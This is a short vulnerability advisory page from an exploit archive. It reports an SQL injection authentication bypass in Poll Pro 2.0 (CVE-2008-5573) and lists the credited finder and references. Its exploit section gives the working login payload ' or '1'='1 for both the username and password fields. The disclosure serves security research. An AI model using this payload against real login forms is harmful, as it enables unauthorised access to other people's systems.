Bug: Poll Pro 2.0 (Auth Bypass) Remote SQL Injection Vulnerability (WLB-2008120135 Ascii Version)

English Version
WLB2

CVE WLB2

 Topic: Poll Pro 2.0 (Auth Bypass) Remote SQL Injection Vulnerability
 Credit: AlpHaNiX
 Date: 2008.12.17
 CWE: CWE-89 (Show similar)
 CVE: CVE-2008-5573 (Show details)

Use CVE to see details like:
- CVSS2,
- Affected Software,
- References

Risk
Local
Remote
Medium
No
Yes

###########################################################################
#-------------------------------AlpHaNiX----------------------------------#
###########################################################################

#Found By : AlpHaNiX
#website : www.offensivetrack.org
#contact : AlpHa[AT]HACKER[DOT]BZ

###########################################################################

#script : PollPro
#Version : v2.0
#download : null
#Demo : http://www.pollpro.com/pollpro2/


###########################################################################

#Exploits :

--=[SQL INJECTION]=--
AUTH BYPASS :

username : ' or '1'='1
password : ' or '1'='1


###########################################################################

References:

http://www.securityfocus.com/bid/32707
http://www.milw0rm.com/exploits/7391
http://secunia.com/advisories/33044
http://osvdb.org/50576

[ ASCII VERSION ]

Copyright 2012, cxsecurity.com